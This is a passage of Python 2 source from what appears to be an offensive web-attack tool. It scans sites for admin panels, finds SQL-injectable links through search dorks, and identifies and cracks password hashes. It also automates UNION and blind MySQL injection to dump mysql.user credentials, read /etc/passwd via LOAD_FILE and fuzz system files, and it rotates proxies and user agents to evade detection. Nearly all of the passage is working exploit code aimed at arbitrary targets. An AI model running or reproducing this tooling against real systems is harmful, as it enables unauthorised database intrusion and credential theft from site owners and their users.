4410.     ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass()
4411.     if len(jerar)==0:
4412.      print "----------"
4413.      print "NOT FOUND" ;file.write( hash +'Not Found')
4414.  
4415.      print "----------"
4416.      
4417.     elif len(jerar)>2:
4418.           jerar.sort()
4419.           print ' ----------------------'
4420.           print ' LEAST POSSIBLE HASHES : ' ;file.write( 'HASH IS : '+hash + " : \nLEAST POSSIBLE HASHES:\n")
4421.           print ' ----------------------'   ;file.write( '---------------------------\n')
4422.           for a in range(int(len(jerar))-2):
4423.             print "[+] ",algorithms[jerar[a+2]]    
4424.             file.write( "[+] "+algorithms[jerar[a+2]] )
4425.             file.write('\n')
4426.     sys.exit(1)
4427. if mode == "--asp" :
4428.        site = site.replace('https://','') ;site = site.replace('http://','')
4429.        
4430.        try:
4431.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4432.           conn = httplib.HTTPConnection(site)
4433.           conn.connect()
4434.           print "\t[!] YES ^_^ ... SERVER Is Online."
4435.        except (httplib.HTTPResponse, socket.error) as Exit:
4436.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4437.            sys.exit(1)
4438.        
4439.        print("\t [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4440.        for admin in asp:
4441.             admin = admin.replace("\n","")
4442.             admin = "/" + admin
4443.             host = site + admin
4444.            
4445.             print ("\t [+] Checking " + host + "...")
4446.             connection = httplib.HTTPConnection(site)
4447.             connection.request("GET",admin)
4448.             response = connection.getresponse()
4449.             var2 = var2 + 1
4450.             if response.status == 200:
4451.                 var1 = var1 + 1
4452.                 print ( "\n\n >>>" + host, "Admin Panel Found!") ;file.write( "\n\n>>>" + host+ " Admin Panel Found!")
4453.                 raw_input("Press ENTER To Continue ....\n")
4454.             elif response.status == 404:
4455.                 var2 = var2
4456.             elif response.status == 302:
4457.                 print ("\n >>>" + host, "Possible Admin Panel (302 - Redirect)") ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4458.             else:
4459.                 print (host, " Interesting Response:", response.status)
4460.             connection.close()
4461.        print("\n\n TH3  END \n")
4462.        print " Admin Panels found : " ,var1
4463.        print " Total Pages Scanned : " ,var2
4464.        sys.exit(1) 
4465. if mode == "--cfm":
4466.         site = site.replace('https://','') ;site = site.replace('http://','')
4467.         try:
4468.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4469.           conn = httplib.HTTPConnection(site)
4470.           conn.connect()
4471.           print "\t[!] YES ^_^ ... SERVER Is Online."
4472.         except (httplib.HTTPResponse, socket.error) as Exit:
4473.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4474.            sys.exit(1)
4475.            
4476.        
4477.        
4478.         print("\n [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4479.         for admin in cfm:
4480.             admin = admin.replace("\n","")
4481.             admin = "/" + admin
4482.             host = site + admin
4483.             print ("\t [+] Checking " + host + "...")
4484.             connection = httplib.HTTPConnection(site)
4485.             connection.request("GET",admin)
4486.             response = connection.getresponse()
4487.             var2 = var2 + 1
4488.             if response.status == 200:
4489.                 var1 = var1 + 1
4490.                 print ( "\n\n>>>" + host, "Admin Panel Found!") ;file.write( "\n\n>>>" + host+ " Admin Panel Found!")
4491.                 raw_input("Press ENTER To Continue .....\n")
4492.             elif response.status == 404:
4493.                 var2 = var2
4494.             elif response.status == 302:
4495.                 print ("\n>>>"+host,"Possible Admin Penel (302 - Redirect)") ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4496.             else:
4497.                 print ( host," Interesting response:", response.status)
4498.             connection.close()
4499.         print("\n\n TH3  END \n")
4500.         print " Admin Panels found : " ,var1
4501.         print " Total Pages Scanned : " ,var2
4502.         sys.exit(1)
4503. if mode == "--cgi":
4504.         site = site.replace('https://','') ;site = site.replace('http://','')
4505.         try:
4506.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4507.           conn = httplib.HTTPConnection(site)
4508.           conn.connect()
4509.           print "\t[!] YES ^_^ ... SERVER Is Online."
4510.         except (httplib.HTTPResponse, socket.error) as Exit:
4511.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4512.            sys.exit(1)
4513.            
4514.        
4515.        
4516.         print("\n [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4517.         for admin in cgi:
4518.             admin = admin.replace("\n","")
4519.             admin = "/" + admin
4520.             host = site + admin
4521.             print ("\t [+] Checking " + host + "...")
4522.             connection = httplib.HTTPConnection(site)
4523.             connection.request("GET",admin)
4524.             response = connection.getresponse()
4525.             var2 = var2 + 1
4526.             if response.status == 200:
4527.                 var1 = var1 + 1
4528.                 print ( "\n\n>>>" + host, "Admin Panel Found!") ;file.write( "\n\n>>>" + host+ " Admin Panel Found!")
4529.                 raw_input("Press ENTER To Continue .....\n")
4530.             elif response.status == 404:
4531.                 var2 = var2
4532.             elif response.status == 302:
4533.                 print ("\n>>>"+host,"Possible Admin Penel (302 - Redirect)") ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4534.             else:
4535.                 print ( host," Interesting response:", response.status)
4536.             connection.close()
4537.         print("\n\n TH3  END \n")
4538.         print " Admin Panels found : " ,var1
4539.         print " Total Pages Scanned : " ,var2
4540.         sys.exit(1)
4541. if mode == "--brf":
4542.         site = site.replace('https://','') ;site = site.replace('http://','')
4543.         try:
4544.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4545.           conn = httplib.HTTPConnection(site)
4546.           conn.connect()
4547.           print "\t[!] YES ^_^ ... SERVER Is Online."
4548.         except (httplib.HTTPResponse, socket.error) as Exit:
4549.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4550.            sys.exit(1)
4551.            
4552.         print("\n [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4553.         for admin in brf:
4554.             admin = admin.replace("\n","")
4555.             admin = "/" + admin
4556.             host = site + admin
4557.             print ("\t [#] Checking " + host + "...")
4558.             connection = httplib.HTTPConnection(site)
4559.             connection.request("GET",admin)
4560.             response = connection.getresponse()
4561.             var2 = var2 + 1
4562.             if response.status == 200:
4563.                 var1 = var1 + 1
4564.                 print ( "\n\n>>>" + host, "Admin Panel Found!") ;file.write( "\n\n>>>" + host+ "Admin Panel Found!")
4565.                 raw_input("Press Enter To Continue ....\n")
4566.             elif response.status == 404:
4567.                 var2 = var2
4568.             elif response.status == 302:
4569.                 print ("\n>>>" + host, "Possible Admin Panel (302 - Redirect)") ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4570.             else:
4571.                 print (host, " Interesting Response:", response.status)
4572.             connection.close()
4573.         print("\n\n  TH3  END \n")
4574.         print " Admin Panels found : " ,var1
4575.         print " Total Pages Scanned : " ,var2
4576.         sys.exit(1)
4577. if mode == "--a":
4578.    
4579.     print " \tSCANNING "+ip+"  IS START WITH DORK  ... " ;file.write("\nSCANNING "+ip+" IS START WITH DORK .. ")
4580.     print " \t\tGET ALL LINKS : "
4581.     print " \n\t\t\tPlease wait ..."
4582.     try :
4583.        Hajar()
4584.     except (urllib2.HTTPError,socket.timeout,socket.error):
4585.          print '    Session Cancelled  !!  Check   Your internet settings '
4586.          sys.exit(1)
4587.     for reb in Muslim :
4588.       if '=' in reb :
4589.          RebelG.append(reb)
4590.     print '---------------------------------------------------------------------------' ;file.write('\n--------------------------------------------')
4591.     print '{!} Number Links Finding with  Your Dork  in Your IP Is :',len(RebelG),'(+)' ;file.write('\n This  is  All Links Finding with Your Dork')
4592.     print '---------------------------------------------------------------------------' ;file.write('\n--------------------------------------------')
4593.     while x <len(RebelG):
4594.          print '[+]',RebelG[x] ;file.write("\n[+]"+RebelG[x])
4595.          x=x+1
4596.     sys.exit(1)
4597. if mode == "--v":
4598.    
4599.    
4600.     print " \tSCANNING "+ip+"  IS START WITH DORK  ..." ;file.write("\nSCANNING "+ip+" IS START WITH DORK .. ")
4601.     print " \t\tGET JUST VULN LINKS :  "
4602.     print " \n\t\t\tPLease Wait .... "
4603.     try :
4604.        Hajar()
4605.     except (urllib2.HTTPError,socket.timeout,socket.error):
4606.          print '    Session Cancelled  !!  Check   Your internet settings '
4607.          sys.exit(1)
4608.     for reb in Muslim :
4609.       if '=' in reb :
4610.          RebelG.append(reb)
4611.          
4612.     print ' \t\t\tNumber Of All Links is >>>  ',len(RebelG)
4613.     while a<len(RebelG):
4614.       try:
4615.         print " \t\t\t\t\tScanning " ,a+1,'Link'
4616.         Test = urllib2.urlopen(RebelG[a]+"'")
4617.         source = Test.read()
4618.         if "MySQL"  in source or "mysql"  in source or "SQL"  in source or "pas de rubrique acc&eacute;ssible"  in source or "OLE DB"  in source or "Syntax error"  in source or "GetArray"  in source or "FetchRow"  in source or "string was"  in source or "VBScript"  in source or "mssql"  in source or "JET Database"  in source or "ODBC Microsoft"  in source or "oci_parse"  in source or "pg_query"  in source or "ybase_query"  in source or "ibase_query"  in source:
4619.           Y.append(RebelG[a])
4620.       except (urllib2.HTTPError,socket.timeout,urllib2.URLError):
4621.         RebelG.pop(a)
4622.       a=a+1
4623.     print '------------------------------------------------------------------------' ;file.write('\n----------------------------------------------')
4624.     print '{!} Number Links Vuln (SQLi) 100% In Your Server Is  :',len(Y),'(+)'      ;file.write('\n This is Links Vuln (SQLi) 100% In Your Server')
4625.     print '------------------------------------------------------------------------' ;file.write('\n----------------------------------------------')
4626.     while b<len(Y) :
4627.        print '[+]',Y[b] ;file.write("\n[+]"+Y[b])
4628.        b=b+1
4629.     sys.exit()
4630. if mode == "-h":
4631.     hashvalue = arg
4632.     configureCookieProcessor()
4633.     seed()
4634.     cracked = 0
4635.     cracked = crackHash (algorithm, hashvalue, hashfile)
4636.     if not cracked and googlesearch and not hashfile:
4637.         searchHash (hashvalue)
4638.     sys.exit()     
4639. if mode != "--crack" and site == "":
4640.         print "[-] URL is required!\n[-] Need Help? --help\n"
4641.         sys.exit(1)
4642. if mode == "None":
4643.         print "[-] Mode is required!\n[-] Need Help? --help\n"
4644.         sys.exit(1)
4645. if mode == "--schema" and arg_database == "None":
4646.         print "[-] Must include -D flag!\n[-] Need Help? --help\n"
4647.         sys.exit(1)
4648. if mode == "--dump":
4649.         if arg_table == "None" or arg_columns == "None":
4650.                 print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n"
4651.                 sys.exit(1)
4652. if proxy != "None":
4653.         if len(proxy.split(".")) == 2:
4654.                 proxy = open(proxy, "r").read()
4655.         if proxy.endswith("\n"):
4656.                 proxy = proxy.rstrip("\n")
4657.         proxy = proxy.split("\n")
4658. if arg_ssl == "off":
4659.         if site[:4] != "http":
4660.                 site = "http://"+site
4661. else:
4662.         if site[:5] != "https":
4663.                 site = "https://"+site
4664. if site.endswith("/*"):
4665.     site = site.rstrip('/*')
4666. if site.endswith("--"):
4667.     site = site.rstrip('--')
4668. if arg_cookie != "None":
4669.         try:
4670.                 cj = cookielib.MozillaCookieJar()
4671.                 cj.load(arg_cookie)
4672.                 cookie_handler = urllib2.HTTPCookieProcessor(cj)
4673.         except:
4674.                 print "[!] There was a problem loading your cookie file!"
4675.                 print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
4676.                 print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
4677.                 sys.exit(1)
4678. else:
4679.         cookie_handler = urllib2.HTTPCookieProcessor()
4680. if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("MECA") == -1:
4681.     print "[-] Site must contain \'MECA\'\n"
4682.     sys.exit(1)
4683. if arg_blind == "--blind" and arg_string == "":
4684.         print "[-] You must specify a --string when using blind methodology.\n"
4685.         sys.exit(1)
4686. if arg_columns != "None":
4687.         arg_columns = arg_columns.split(",")
4688. if arg_insert != "None":
4689.         arg_insert = arg_insert.split(",")
4690. if mode == "--crack" and arg_wordlist == "":
4691.         print "[-] You must specify a --wordlist to crack with.\n"
4692.         sys.exit(1)
4693. agent = random.choice(USER_AGENTS)
4694.  
4695. if mode == "--crack":
4696.         try:
4697.                 arg_wordlist = open(arg_wordlist, "r")
4698.         except(IOError):
4699.                 print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n")
4700.                 sys.exit(1)
4701.         if len(arg_hash) != 40 and len(arg_hash) != 16:
4702.                 print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n")
4703.                 sys.exit(1)
4704.         arg_wordlist = arg_wordlist.readlines()
4705.         print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist)))
4706.         if len(arg_hash) == 40:
4707.                 print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash)
4708.                 try:
4709.                         import hashlib
4710.                         for word in arg_wordlist:
4711.                                 if arg_hash == c1(word):
4712.                                         print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
4713.                                         break
4714.                 except(ImportError):
4715.                         import sha
4716.                         for word in arg_wordlist:
4717.                                 if arg_hash == c2(word):
4718.                                         print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
4719.                                         break
4720.         else:
4721.                 print "[+] Detected MySQL v4 Hash:",arg_hash
4722.                 print "[+] Try MECA hash database @ "
4723.                 for word in arg_wordlist:
4724.                         word = word.rstrip("\n")
4725.                         if arg_hash == mysql323(word):
4726.                                 print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n")
4727.                                 break
4728.         print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n")
4729.         sys.exit(1)
4730.        
4731.  
4732. print "[+] URL:",site;file.write("\n\n[+] URL: "+site)
4733. print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X"))
4734. print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end)
4735. print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie)
4736. if site[:5] == "https":
4737.         print "[+] SSL: Yes";file.write("\n[+] SSL: Yes")
4738. else:
4739.         print "[+] SSL: No";file.write("\n[+] SSL: No")
4740. print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent)
4741.        
4742.  
4743. proxy_list = [];proxy_list_count = []
4744. if proxy != "None":
4745.     print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...")
4746.     for p in proxy:
4747.        
4748.         try:
4749.                 match = re.findall(":",p)
4750.                 if len(match) == 3:
4751.                     arg_proxy_auth = []
4752.                     prox = p.split(":")
4753.                     arg_proxy_auth += prox
4754.                 if arg_proxy_auth != "":
4755.                     proxy_auth_handler = urllib2.HTTPBasicAuthHandler()
4756.                     proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3])
4757.                     opener = urllib2.build_opener(proxy_auth_handler)
4758.                     opener.open("http://www.google.com")
4759.                     proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler))
4760.                     proxy_list_count.append(p);arg_proxy_auth = ""
4761.                 else:
4762.                     proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
4763.                     opener = urllib2.build_opener(proxy_handler)
4764.                     opener.open("http://www.google.com")
4765.                     proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
4766.                     proxy_list_count.append(p)
4767.                 if len(match) == 3 or len(match) == 1:
4768.                     print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success")
4769.                 else:
4770.                     print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success")
4771.         except:
4772.             print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0]))
4773.             pass
4774.     if len(proxy_list) == 0:
4775.         print "[-] All proxies have failed. App Exiting"
4776.         sys.exit(1)
4777.     print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete")
4778. else:
4779.     print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given")
4780.     proxy_list.append(urllib2.build_opener(cookie_handler))
4781.  
4782.     proxy_list_count.append("None")
4783. proxy_num = 0
4784. proxy_len = len(proxy_list)
4785.  
4786. ## Blind String checking!
4787. if arg_blind == "--blind":
4788.         print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!")
4789.         head_URL = site+"+AND+1=1"
4790.         source = GetThatShit(head_URL)
4791.         match = re.findall(arg_string,source)
4792.         if len(match) >= 2:
4793.                 print "\n[-] The String you used has been found on the target page in-use more than 2 times"
4794.                 print "[-] This might lead to false positives with the blind methodology"
4795.                 print "[-] Might not mean anything.. I am just trying to help out.."
4796.                 print "[-] If you have problems you might know why.. ;-)\n"
4797.         if len(match) == 0:
4798.                 print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n"
4799.                 sys.exit(1)
4800.         if len(match) == 1:
4801.                 print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)")
4802.                
4803.  
4804. if mode == "--findcol":
4805.         print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...")
4806.         print "[+] Testing: ",
4807.         file.write("\n[+] Testing: ",)
4808.         checkfor=[];nullFound=[];nullnum=[];makepretty = ""
4809.         sitenew = site+"+AND+1=2+UNION+SELECT+"
4810.         for x in xrange(1,colMax):
4811.                 try:
4812.                         sys.stdout.write("%s," % (x))
4813.                         file.write(str(x)+",")
4814.                         sys.stdout.flush()
4815.                         MECA = "dark"+str(x)+"code"
4816.                         checkfor.append(MECA)  
4817.                         if x > 1:
4818.                                 sitenew += ","
4819.                         sitenew += "0x"+MECA.encode("hex") 
4820.                         finalurl = sitenew+arg_end
4821.                         source = GetThatShit(finalurl)
4822.                         for y in checkfor:
4823.                                 colFound = re.findall(y,source)
4824.                                 if len(colFound) != 0:
4825.                                         nullFound.append(colFound[0])
4826.                         if len(nullFound) >= 1:
4827.                                 print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor)))
4828.                                 print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",)
4829.                                 for z in nullFound:
4830.                                         nullcol = re.findall(("\d+"),z)
4831.                                         nullnum.append(nullcol[0])
4832.                                         sys.stdout.write("%s," % (nullcol[0]))
4833.                                         file.write(str(nullcol[0])+",")
4834.                                         sys.stdout.flush()
4835.                                 for z in xrange(0,len(checkfor)):
4836.                                         z+=1
4837.                                         if z > 1:
4838.                                                 makepretty += ","
4839.                                         makepretty += str(z)
4840.                                 site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end
4841.                                 print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site)
4842.                                 for z in nullnum:
4843.                                         site = site.replace("+"+z+",","+MECA,")
4844.                                         site = site.replace(","+z+",",",MECA,")
4845.                                         site = site.replace(","+z+arg_end,",MECA"+arg_end)
4846.                                 print "[!] PRO_INJECTOR URL:",site;file.write("\n[!] PRO_INJECTOR URL: "+site)
4847.                                 print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
4848.                                 print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
4849.                                 print "[-] Done\n";file.write("\n[-] Done\n")
4850.                                
4851.                                 file.close();sys.exit(1)
4852.                 except (KeyboardInterrupt, SystemExit):
4853.                         raise
4854.                 except:
4855.                         pass
4856.                        
4857.         print "\n[!] Sorry Column Length could not be found."
4858.         file.write("\n[!] Sorry Column Length could not be found.")
4859.         print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!"
4860.         print "[-] Done\n"
4861.         sys.exit(1)
4862.  
4863.  
4864. if arg_blind != "--blind":
4865.         head_URL = site.replace("MECA","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
4866.         print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n")
4867.         source = GetThatShit(head_URL)
4868.         match = re.findall("\x1e\x1e\S+",source)
4869.         if len(match) >= 1:
4870.                 match = match[0][0:].split("\x1e")
4871.                 version = match[2]
4872.                 user = match[3]
4873.                 database = match[4]
4874.                 print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n")
4875.                 print "\tUser:", user;file.write("\tUser: "+user+"\n")
4876.                 print "\tVersion:", version;file.write("\tVersion: "+version)
4877.         else:
4878.                 print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n"
4879.                 sys.exit(1)
4880. else:
4881.         print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...")
4882.         while 1:
4883.                 config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
4884.                 source = GetThatShit(config_URL)
4885.                 match = re.findall(arg_string,source)
4886.                 if len(match) >= 1:
4887.                         print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
4888.                         version += str(ser_ver)
4889.                         break
4890.                 if ser_ver == 6:
4891.                         print "[-] Was unable to determine MySQL version.\n[-] Done"
4892.                         sys.exit(1)
4893.                 ser_ver+=1
4894.                
4895.  
4896. if mode == "--schema" or mode == "--dbs" or mode == "--full":
4897.         if version[0] == str(4):
4898.                 print "\n[-] Mode Selected is incompatible with MySQL v4 Servers"
4899.                 print "[-] -h for help"
4900.                 sys.exit(1)
4901.  
4902. if mode == "--info" and arg_blind != "--blind":
4903.         head_URL = site.replace("MECA","0x"+"MECA".encode("hex"))+"+FROM+mysql.user"+arg_end
4904.         source = GetThatShit(head_URL)
4905.         match = re.findall("MECA",source)
4906.         if len(match) >= 1:
4907.                 yesno = "YES <-- w00t w00t"
4908.         else:
4909.                 yesno = "NO"
4910.         print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
4911.         if yesno == "YES <-- w00t w00t":
4912.                 print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password")
4913.                 head_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end
4914.                 source = GetThatShit(head_URL)
4915.                 match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0]
4916.                 print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend))
4917.                 head_URL = site.replace("MECA","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)")
4918.                 head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end
4919.                 for x in range(0,int(userend)):
4920.                         try:
4921.                                 source = GetThatShit(head_URL.replace("NUM",str(x)))
4922.                                 match = re.findall("\x1e\x1e\S+",source)
4923.                                 match = match[0].strip("\x1e").split("\x1e")
4924.                                 if len(match) != 3:
4925.                                         nullvar = "NULL"
4926.                                         match += nullvar
4927.                                 print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2]))
4928.                         except (KeyboardInterrupt, SystemExit):
4929.                                 raise
4930.                         except:
4931.                                 pass
4932.         else:
4933.                 print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!"
4934.                 file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!")
4935.         head_URL = site.replace("MECA","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end
4936.         source = GetThatShit(head_URL)
4937.         match = re.findall("MECA",source)
4938.         if len(match) >= 1:
4939.                 yesno = "YES <-- w00t w00t"
4940.         else:
4941.                 yesno = "NO"
4942.         print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
4943.         if yesno == "YES <-- w00t w00t":
4944.                 fuzz_load = open(loadfilefuzz, "r").readlines()
4945.                 head_URL = site.replace("MECA","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end
4946.                 source = GetThatShit(head_URL)
4947.                 match = re.findall("MECA",source)
4948.                 if len(match) > 1:
4949.                         onoff = "OFF <-- w00t w00t"
4950.                 else:
4951.                         onoff = "ON"       
4952.                 print "\n[+] Magic quotes are:",onoff
4953.                 yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): "))
4954.                 if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes":
4955.                         print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...")
4956.                         print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n")
4957.                         for sysfile in fuzz_load:
4958.                                 sysfile = sysfile.rstrip("\n")
4959.                                 if proxy != "None":
4960.                                         sysfile = sysfile.replace("/","%2F")
4961.                                         sysfile = sysfile.replace(".","%2E")
4962.                                 if onoff == "OFF <-- w00t w00t":
4963.                                         head_URL = site.replace("MECA","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end
4964.                                 else:
4965.                                         head_URL = site.replace("MECA","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end
4966.                                 source = GetThatShit(head_URL)
4967.                                 match = re.findall("MECA",source)
4968.                                 if len(match) > 0:
4969.                                     print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile)
4970.                                     head_URL = head_URL.replace("concat(","")
4971.                                     head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","")
4972.                                     print "[!]",head_URL;file.write("\n[!] "+head_URL)
4973.         else:
4974.                 print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!"
4975.                 file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!")        
4976.  
4977. if mode == "--fuzz":
4978.         fuzz_tables = open(tablefuzz, "r").readlines()
4979.         fuzz_columns = open(columnfuzz, "r").readlines()
4980.         print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...")
4981.         print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
4982.         print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
4983.         print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...")
4984.         if arg_blind == "--blind":
4985.                 fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
4986.         else:
4987.                 fuzz_URL = site.replace("MECA","0x"+"MECA".encode("hex"))+"+FROM+TABLE"+arg_end
4988.         for table in fuzz_tables:
4989.                 table = table.rstrip("\n")
4990.                 table_URL = fuzz_URL.replace("TABLE",table)
4991.                 source = GetThatShit(table_URL)
4992.                 if arg_blind == "--blind":
4993.                         match = re.findall(arg_string,source)
